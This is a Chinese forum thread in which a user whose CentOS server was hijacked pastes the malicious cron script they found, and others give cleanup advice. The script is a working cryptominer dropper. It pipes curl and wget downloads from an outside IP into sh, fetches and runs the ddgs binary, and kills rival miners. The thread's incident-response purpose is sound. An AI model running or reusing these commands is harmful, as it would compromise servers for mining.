今天接到阿里短信提醒服务器有异常,登陆发现 cup 占用 100%。于是查看看 crontab 发现有个异常定时任务下载执行某段 sh。地址如下: http://149.56.106.215:8000/i.sh ,目前已经修改账户密码,删除定时任务,kill 异常程序,看进程展示正常了。请问接下来可以做什么操作尽量保证服务器正常运行。
服务器系统:centos 7
附上脚本:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013
curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill
1
whatever93 2018-07-31 17:03:56 +08:00 1
ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013 curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013 fi 从这段下手 /tmp/ddgs.3013 这个文件应该是主要的耗 cpu 文件 所以先删除他的文件 /tmp/ddgs.3013 rm -f /tmp/ddgs.3013 然后创建一个 touch /tmp/ddgs.3013 赋予不允许删除、添加、修改的权限 chattr +i /tmp/ddgs.3013 |
2
dorothyREN 2018-07-31 17:05:17 +08:00 1
清理完以后重装系统。
|
3
whatever93 2018-07-31 17:14:23 +08:00 1
然后 systemctl stop crond 先停止计划任务
清除脚本写的定时任务 查看~/.ssh/authorized_keys 里有没有异常的 key 清除掉 改密码 加防暴力破解 我自己用 fail2ban |
4
metrxqin 2018-07-31 17:20:18 +08:00 1
调查下脚本怎么注入的。
|
5
jimmyczm 2018-07-31 17:22:09 +08:00 1
修改 ssh 的默认端口
|
6
defunct9 2018-07-31 17:22:32 +08:00 1
开 ssh,让我上去看看
|
7
IntFloat OP @whatever93 感谢细致的回复,已经按您的方法清理了。希望不会有残留了
@dorothyREN 有些环境配置太繁琐了 @metrxqin 可能是账号密码泄露 - - @jimmyczm 嗯嗯 新建主机时候已经改了 再改一次 @defunct9 毕竟是公司的测试服务器 |
8
hfenger 2018-07-31 17:53:08 +08:00
这狗逼的下载服务器炸了吧?我开了一万个线程都没速度啊
|
9
dorothyREN 2018-07-31 18:03:20 +08:00 1
@IntFloat 不是繁琐的问题,是谁也不知道服务器上究竟被做了什么手脚,脚本只是你能看到的。所以被入侵以后一般都是查找到原因以后重装系统并修复漏洞
|
11
ywgx 2018-07-31 18:53:44 +08:00 via Android
目测你是 jenkins 机器?
|
12
scukmh 2018-07-31 19:05:01 +08:00
清理完直接重装,没个靠谱运维这是最快的办法。
|
13
cpdyj 2018-07-31 19:16:04 +08:00 via Android
建议你检查下其他所有可能下钩子的地方,bash,内核,模块,启动脚本,hash 一下 bin 里的东西和其他服务器对比下。。
其实建议还是重装系统,最暴力的方法 |
14
leakless 2018-08-01 00:49:31 +08:00
被人拿来挖矿了好吧。。。
上面这分析一堆就没有想到这是挖矿的吗。。。 p.s. 想啥呢啊 找人看看是不是你们的系统有洞被人日了 然后服务器赶紧重装。。。 |
15
johnnie502 2018-08-01 08:48:10 +08:00
不重装是等着过年呢
|
16
lieh222 2018-08-01 09:10:33 +08:00
格式化,重装,把业务用 docker 部署,数据不值钱的话随便攻击
|